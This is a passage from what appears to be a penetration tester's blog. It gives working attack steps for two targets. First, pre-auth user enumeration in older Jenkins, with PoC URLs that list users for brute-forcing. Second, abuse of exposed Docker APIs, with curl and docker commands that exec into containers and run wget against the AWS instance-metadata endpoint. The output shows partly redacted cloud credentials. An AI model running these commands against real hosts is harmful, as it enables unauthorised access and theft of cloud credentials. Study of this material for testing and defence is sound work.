<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Pre-auth User Information Leakage</span><br />
<span style="background-color: white; color: #444444; font-family: "times" , "times new roman" , serif;">While testing Jenkins, it’s a common scenario that you want to perform a brute-force attack but you don’t know which account you can try(a valid credential can read the source at least so it’s worth to be the first attempt).</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="background-color: white;">In this situation, this vulnerability is useful!</span><span style="background-color: white;">Due to the lack of permission check on search functionality. By modifying the </span><code style="background-color: rgba(0, 0, 0, 0.04); border-radius: 4px; box-sizing: border-box; padding: 2px 4px;">keyword</code><span style="background-color: white;"> from a to z, an attacker can list all users on Jenkins! </span></span></blockquote>
</div>
<div style="background-color: white; box-sizing: border-box; font-size: 1.25em; font-weight: 300; line-height: 1.1; margin: 1.2em 0px; position: relative;">
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">PoC:</span></div>
<pre style="background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; font-size: inherit; padding: 0px;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]</span></code></pre>
</div>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHkkv11zMFibrJLfPwpbEvTpvRdvY9MGF_wH_ivvjOuf0BKEA6ZX1t-LWtfdVoUwtOOxOqgzT0VC90WRYGNWyw7UiucLMOmIQ-WfRrOBSX3kEro8v02mINz_gGpr2Ttc04-7LgzEFGwg/s1600/Screen+Shot+2019-02-25+at+2.55.42+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="798" data-original-width="1600" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHkkv11zMFibrJLfPwpbEvTpvRdvY9MGF_wH_ivvjOuf0BKEA6ZX1t-LWtfdVoUwtOOxOqgzT0VC90WRYGNWyw7UiucLMOmIQ-WfRrOBSX3kEro8v02mINz_gGpr2Ttc04-7LgzEFGwg/s640/Screen+Shot+2019-02-25+at+2.55.42+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">/securityRealm/user/admin/search/index?q=a</span></td></tr>
</tbody></table>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEEvfIKjuuAJbX8OgtE8zaVdoqxMYNwqkOPkffDUN38TLIGyi6zrhAGAGS9Iyht43tloVvbGCpK1oS1wlifiOjkdNeBpbRQppFJmbGUj6CFMLEUTHU08EkJmDaxjUeS6_z4QNvxOIfenE/s1600/Screen+Shot+2019-02-25+at+2.57.06+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="496" data-original-width="1292" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEEvfIKjuuAJbX8OgtE8zaVdoqxMYNwqkOPkffDUN38TLIGyi6zrhAGAGS9Iyht43tloVvbGCpK1oS1wlifiOjkdNeBpbRQppFJmbGUj6CFMLEUTHU08EkJmDaxjUeS6_z4QNvxOIfenE/s640/Screen+Shot+2019-02-25+at+2.57.06+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">/securityRealm/user/admin/search/index?q=c</span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
</span><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: "times" , "times new roman" , serif; "><b>ALERT</b></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="color: #444444;"><br /></span>
<span style="color: #444444; ">Even though the advisory says 2.138_1 i tested against 2.138 and the exploit doesn't work.</span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="color: #444444;"><br /></span>
<span style="color: #444444;"></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">SOOOOO you are looking for Jenkins <= 2.137</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><span style="font-family: "times" , "times new roman" , serif;">If jenkins is really old the above should work and also</span> <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-1000395" style="font-family: times, "times new roman", serif;" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2017-1000395</a><span style="font-family: "times" , "times new roman" , serif;"> where you can get the email address via similar query.</span></span></div>
</td></tr>
</tbody></table>
<ul>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">versions up to (including) 2.73.1</span></li>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">versions up to (including) 2.83</span></li>
</ul>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="background-color: white; color: #444444; font-family: "times" , "times new roman" , serif; font-size: 1.25em;">PoC:</span><br />
<pre style="background-color: #f8f8f8; border-radius: 5px; border: 0px; box-sizing: border-box; font-size: 0.9em; line-height: 1.45; margin-bottom: 1.1em; overflow-wrap: break-word; padding: 10px 20px; white-space: pre-wrap;"><code style="background-color: transparent; border-radius: 0px; box-sizing: border-box; font-size: inherit; padding: 0px;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">http://jenkins.local/securityRealm/user/admin/api/xml</span></code></pre>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">with 2.137 you can get username/id</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4bN6TWMKFqbxwji4ChXqm-5o7Dd4x5bxx9mXpWj8TahGbNCbWnv-pYCbSDr_bFXu7gtNYe7XeFvEakKlRZmEB2rb5SmONmjriulq3r1ejsoQ-kHaDTwwb3IkLbYw9nxs77PNZZZveVsY/s1600/Screen+Shot+2019-02-25+at+3.00.13+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="385" data-original-width="1600" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4bN6TWMKFqbxwji4ChXqm-5o7Dd4x5bxx9mXpWj8TahGbNCbWnv-pYCbSDr_bFXu7gtNYe7XeFvEakKlRZmEB2rb5SmONmjriulq3r1ejsoQ-kHaDTwwb3IkLbYw9nxs77PNZZZveVsY/s640/Screen+Shot+2019-02-25+at+3.00.13+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;">/securityRealm/user/cg/api/xml</span></td></tr>
</tbody></table>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-84362251232816310922019-02-01T08:32:00.002-05:002019-02-01T08:43:04.312-05:00Abusing Docker API | Socket<span style="color: #444444;">Notes on abusing open Docker sockets</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">This wont cover breaking out of docker containers</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Ports: usually 2375 & 2376 but can be anything</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Refs:</span><br />
<span style="color: #444444;"><br /></span>
<a href="https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0" target="_blank"><span style="color: #444444;">https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0</span></a><br />
<a href="https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way" target="_blank"><span style="color: #444444;">https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way</span></a><br />
<a href="https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html" target="_blank"><span style="color: #444444;">https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html</span></a><br />
<a href="https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html" target="_blank"><span style="color: #444444;">https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html</span></a><br />
<a href="https://infoslack.com/devops/exploring-docker-remote-api" target="_blank"><span style="color: #444444;">https://infoslack.com/devops/exploring-docker-remote-api</span></a><br />
<a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf" target="_blank"><span style="color: #444444;">https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf</span></a><br />
<a href="https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/" target="_blank"><span style="color: #444444;">https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/</span></a><br />
<a href="https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/" target="_blank"><span style="color: #444444;">https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/</span></a><br />
<a href="https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124" target="_blank"><span style="color: #444444;">https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124</span></a><br />
<a href="https://www.exploit-db.com/exploits/42356" target="_blank"><span style="color: #444444;">https://www.exploit-db.com/exploits/42356</span></a><br />
<a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb" target="_blank"><span style="color: #444444;">https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb</span></a><br />
<a href="http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html" target="_blank"><span style="color: #444444;">http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html</span></a><br />
<a href="https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/" target="_blank"><span style="color: #444444;">https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/</span></a><br />
<a href="https://blog.ropnop.com/plundering-docker-images/" target="_blank"><span style="color: #444444;">https://blog.ropnop.com/plundering-docker-images/</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Enable docker socket (Create practice locations)</span><br />
<a href="https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd" target="_blank"><span style="color: #444444;">https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Having the docker API | socket exposed is essentially granting root to any of the containers on the system</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The docker socket is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or if configured, outside the container against the host running docker.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">All the docker socket magic is happening via the docker API. For example if we wanted to spin up an nginx container we'd do the below:</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Create a nginx container</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">The following command uses curl to send the {“Image”:”nginx”} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">$ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Start the container</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> $ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">As mentioned above you can also have the docker socket listen on a TCP port</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">You can validate it's docker by hitting it with a version request</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> $ curl -s http://open.docker.socket:2375/version | jq</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Version": "1.13.1",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ApiVersion": "1.26",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "MinAPIVersion": "1.12",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "GitCommit": "07f3374/1.13.1",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "GoVersion": "go1.9.4",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Os": "linux",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Arch": "amd64",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "KernelVersion": "3.10.0-514.26.2.el7.x86_64",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "BuildTime": "2018-12-07T16:13:51.683697055+00:00",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">}</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"> or with the docker client</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 version</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Server:</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Engine:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Version: 1.13.1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> API version: 1.26 (minimum version 1.12)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Go version: go1.9.4</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Git commit: 07f3374/1.13.1</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Built: Fri Dec 7 16:13:51 2018</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> OS/Arch: linux/amd64</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Experimental: false</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">This is basically a shell into the container</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Get a list of running containers with the ps command</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">docker -H open.docker.socket:2375 ps</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">72cd30d28e5c gogs/gogs "/app/gogs/docker/st…" 5 days ago Up 5 days 0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp gogs</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">b522a9034b30 jdk1.8 "/bin/bash" 5 days ago Up 5 days myjdk8</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><b>0f5947860c17 centos/mysql-57-centos7 "container-entrypoin…" 8 days ago Up 8 days 0.0.0.0:3306->3306/tcp mysql</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">3965c004c7a7 192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT "java -jar /app.jar" 8 days ago Up 8 days 0.0.0.0:12000->12000/tcp config</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">3f466b754971 42cb59080921 "/bin/bash" 8 days ago Up 8 days jdk8</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">6499013fdc2d registry "/entrypoint.sh /etc…" 8 days ago Up 8 days 0.0.0.0:5000->5000/tcp registry</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Exec into one of the containers</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 exec -it mysql /bin/bash</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">bash-4.2$ whoami</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">mysql</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Other commands</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Are there some stopped containers?</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 ps -a</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">What are the images pulled on the host machine?</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">docker -H open.docker.socket:2375 images</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">I've frequently not been able to get the docker client to work well when it comes to the exec command but you can still code exec in the container with the API. The example below is using curl to interact with the API over https (if enabled). to create and exec job, set up the variable to receive the out put and then start the exec so you can get the output.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Using curl to hit the API</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the docker client but you can with curl no problem to hit the docker API.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Docker socket to metadata URL</span><br />
<a href="https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec" target="_blank"><span style="color: #444444;">https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Below is an example of hitting the internal AWS metadata URL and getting the output</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">list containers:</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure https://tls-opendocker.socker:2376/containers/json | jq</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">[</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Names": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "/docker_snip_1"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Image": "dotnetify",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Command": "cmd /S /C 'dotnet netify-temp.dll'",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Created": 1541018555,</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Ports": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "IP": "0.0.0.0",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PrivatePort": 443,</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PublicPort": 50278,</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">List processes in a container:</span></b><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure https://tls-opendocker.socker:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Processes": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "smss.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "7868",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.062",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "225.3kB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "csrss.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10980",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.859",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "421.9kB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "wininit.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10536",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.078",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "606.2kB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "services.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10768",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:00.687",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "1.208MB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "lsass.exe",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "10416",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "00:00:36.000",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "4.325MB"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Set up and exec job to hit the metadata URL:</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}</span></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Get the output:</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Code" : "Success",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "LastUpdated" : "2019-01-29T20:12:58Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Type" : "AWS-HMAC",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "AccessKeyId" : "ASIATRSNIP",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Expiration" : "2019-01-30T02:43:34Z"</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">}</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;"> Docker secrets</span></b><br />
<span style="color: #444444;"> relevant reading <a href="https://docs.docker.com/engine/swarm/secrets/" target="_blank">https://docs.docker.com/engine/swarm/secrets/</a></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"> <b>list secrets (no secrets/swarm not set up)</b></span><br />
